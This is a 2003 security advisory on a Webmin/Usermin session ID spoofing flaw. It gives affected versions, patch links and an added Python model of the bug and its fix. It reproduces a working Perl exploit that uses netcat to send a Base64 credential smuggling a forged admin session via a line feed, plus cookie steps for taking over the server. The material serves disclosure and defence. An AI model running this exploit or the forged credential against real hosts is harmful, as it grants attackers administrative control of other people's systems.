Webmin/Usermin Session ID Spoofing Unauthorized Access Vulnerability

Published: 2003-02-24
Updated: 2003-02-28
Severity: High
Threat: Control of the application and the host it runs on
Bug type: Input validation error
Exploitation: Remote, against the server
BUGTRAQ ID: 6915
CVE(CAN) ID: CAN-2003-0101

Affected systems

EnGarde Guardian Digital WebTool 1.2
Webmin 0.970, 0.990, 1.050 and 1.060, and Usermin 0.4 through 0.99 (the versions for which upgrades are listed under Solution below)

Detailed description

Webmin and Usermin are web-based administration tools for UNIX systems, used for tasks such as managing user accounts.

Webmin authenticates a user once and then identifies that user by a session ID (SID) it issues, which the browser returns in the sid cookie. The username taken from Base64-decoded HTTP Basic authentication is not filtered for control characters before it is passed on to the code that maintains the session ID store. A username containing a line feed can therefore inject an extra record, and an attacker can forge a SID for any user, including the administrative account, without knowing that user's password.

For example, an attacker simply registers a session with SID 1234567890 for the user 'admin', then sends the following cookies with every request:

sid=1234567890; testing=1

so that the HTTP Cookie header reads:

Cookie: sid=1234567890; testing=1

When the Webmin server receives this cookie it treats the request as an authenticated session for 'admin', giving the attacker full control of the Webmin server. (The testing=1 cookie is the one Webmin sets to check that the browser accepts cookies; it must be present alongside sid.)

Test code

The Base64 credential in the request below decodes to "a a 1\nnew 1234567890 admin:password"; the embedded line feed is what smuggles the forged SID record in.

#!/usr/bin/perl
#
# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#
use strict;
use warnings;

print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";

my $nc = "/usr/bin/netcat";

if ($#ARGV == -1) {
    print "Syntax:\n\t$0 hostname\n";
    exit(1);
}
my $hostname = $ARGV[0];

if (! -x $nc) {
    print "netcat not found!\n";
    exit(2);
}

# Pipe one raw HTTP request to miniserv on port 10000; netcat's own output
# is discarded (portable sh redirection, the original used csh-style ">&").
open(my $nc_fh, "|-", "$nc $hostname 10000 >/dev/null 2>&1")
    or die "cannot run $nc: $!\n";
print $nc_fh "GET / HTTP/1.1\n";
print $nc_fh "Host: $hostname\n";
print $nc_fh "User-agent: webmin\n";
# Basic credential for "a a 1\nnew 1234567890 admin:password"
print $nc_fh "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close($nc_fh);

print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";

Solution

Upgrade:

EnGarde Guardian Digital WebTool 1.2:
    Engarde Secure Linux Upgrade WebTool-1.2-1.0.74.noarch.rpm
    http://ftp.engardelinux.org/pub/engarde/stable/updates/noarch/WebTool-1.2-1.0.74.noarch.rpm
    Engarde Secure Linux Upgrade WebTool-userpass-1.2-1.0.74.noarch.rpm
    http://ftp.engardelinux.org/pub/engarde/stable/updates/noarch/WebTool-userpass-1.2-1.0.74.noarch.rpm

Webmin Usermin 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 0.91, 0.92, 0.93, 0.94, 0.95, 0.96, 0.97, 0.98, 0.99:
    Webmin Upgrade usermin-1.000.tar.gz
    http://www.webmin.com/udownload.html

Webmin Usermin 0.97 and Webmin Webmin 0.970 (MandrakeSoft packages, all from http://www.mandrakesecure.net/en/ftp.php):
    webmin-0.970-2.1mdk.noarch.rpm: Linux-Mandrake 7.2, Single Network Firewall 7.2
    webmin-0.970-2.2mdk.noarch.rpm: Mandrake Linux 8.0, Mandrake Linux 8.0/PPC
    webmin-0.970-2.3mdk.noarch.rpm: Mandrake Linux 8.1, Mandrake Linux 8.1/IA64, Mandrake Linux 8.2, Mandrake Linux 8.2/PPC

Webmin Usermin 0.99 (MandrakeSoft package):
    webmin-0.990-6.1mdk.noarch.rpm: Mandrake Linux 9.0
    http://www.mandrakesecure.net/en/ftp.php

Webmin Webmin 0.990:
    No upgrade package is listed.

Webmin Webmin 1.050, 1.060:
    Webmin Upgrade webmin-1.070.tar.gz
    http://www.webmin.com/download.html

Related information

Credit: Keigo Yamazaki and Cintia M. Imanishi.

References:
http://www.securityfocus.com/advisories/5010
http://www.securityfocus.com/advisories/5014
http://www.securityfocus.com/advisories/5024
http://www.securityfocus.com/advisories/5028
http://www.securityfocus
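The injection described in the Detailed description, worked through as an added Python example (this is not code from the advisory, from Webmin or from the exploit author). It decodes the exploit's Basic credential to expose the embedded line feed, then pushes the resulting username through a deliberately simplified model of a newline-delimited session-manager channel, once with the username interpolated verbatim (the flaw) and once with control characters rejected first. The command names delay and new, their field layout, the client address 10.0.0.5 and the class and function names are assumptions made for illustration, not miniserv.pl's actual internal protocol.

```python
import base64
import re
from typing import Dict, Optional, Tuple

# The Basic credential sent by the advisory's exploit script.
EXPLOIT_TOKEN = "YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ="


def decode_basic(token: str) -> Tuple[str, str]:
    """Decode an HTTP Basic credential into (user, password), splitting at the first colon."""
    raw = base64.b64decode(token).decode("latin-1")
    user, _, password = raw.partition(":")
    return user, password


def forge_token(sid: str, user: str) -> str:
    """Build a credential whose username smuggles a 'new <sid> <user>' line.

    The leading "a a 1" fills out the first line so the injected second line
    starts with a fresh command (assumed command shape, modelled below).
    """
    cred = f"a a 1\nnew {sid} {user}:password"
    return base64.b64encode(cred.encode("latin-1")).decode("ascii")


class SessionManager:
    """Assumed model of a line-oriented session store: one space-separated command per line."""

    def __init__(self) -> None:
        self.sessions: Dict[str, str] = {}  # sid -> user

    def feed(self, text: str) -> None:
        for line in text.split("\n"):
            fields = line.split()
            if not fields:
                continue
            if fields[0] == "new" and len(fields) >= 3:
                # "new <sid> <user> ..." registers a live session for <user>
                self.sessions[fields[1]] = fields[2]
            # "delay <user> <ip> <ok>" (failed-login bookkeeping) is ignored here

    def user_for(self, sid: str) -> Optional[str]:
        return self.sessions.get(sid)


def report_login_vulnerable(mgr: SessionManager, user: str, ip: str, ok: int) -> None:
    # The flaw: the attacker-controlled username is interpolated verbatim into a
    # newline-delimited channel, so a "\n" inside it starts a second command.
    mgr.feed(f"delay {user} {ip} {ok}\n")


CONTROL_OR_SPACE = re.compile(r"[\x00-\x20\x7f]")


def report_login_hardened(mgr: SessionManager, user: str, ip: str, ok: int) -> None:
    # Reject anything that could break the one-command-per-line framing before
    # it reaches the channel; a legitimate username never needs these bytes.
    if CONTROL_OR_SPACE.search(user):
        raise ValueError("username contains control or whitespace characters")
    mgr.feed(f"delay {user} {ip} {ok}\n")


def run(reporter) -> Optional[str]:
    """Replay the exploit credential through `reporter`; return who owns SID 1234567890."""
    mgr = SessionManager()
    user, _password = decode_basic(EXPLOIT_TOKEN)
    ok = 0  # the password check fails: "password" is not admin's real password
    try:
        reporter(mgr, user, "10.0.0.5", ok)  # constructed client address
    except ValueError:
        return None
    return mgr.user_for("1234567890")


if __name__ == "__main__":
    print(repr(decode_basic(EXPLOIT_TOKEN)[0]))  # shows the embedded "\n"
    print("vulnerable:", run(report_login_vulnerable))
    print("hardened:  ", run(report_login_hardened))
```

The password check failing makes no difference in the vulnerable path: the forged "new" record is written before, and independently of, any decision about the login itself, which is why the advisory rates this as full control rather than a password-guessing issue. The hardened variant rejects rather than strips offending bytes, because stripping would quietly turn a name such as "ad\nmin" into "admin" and move the problem elsewhere.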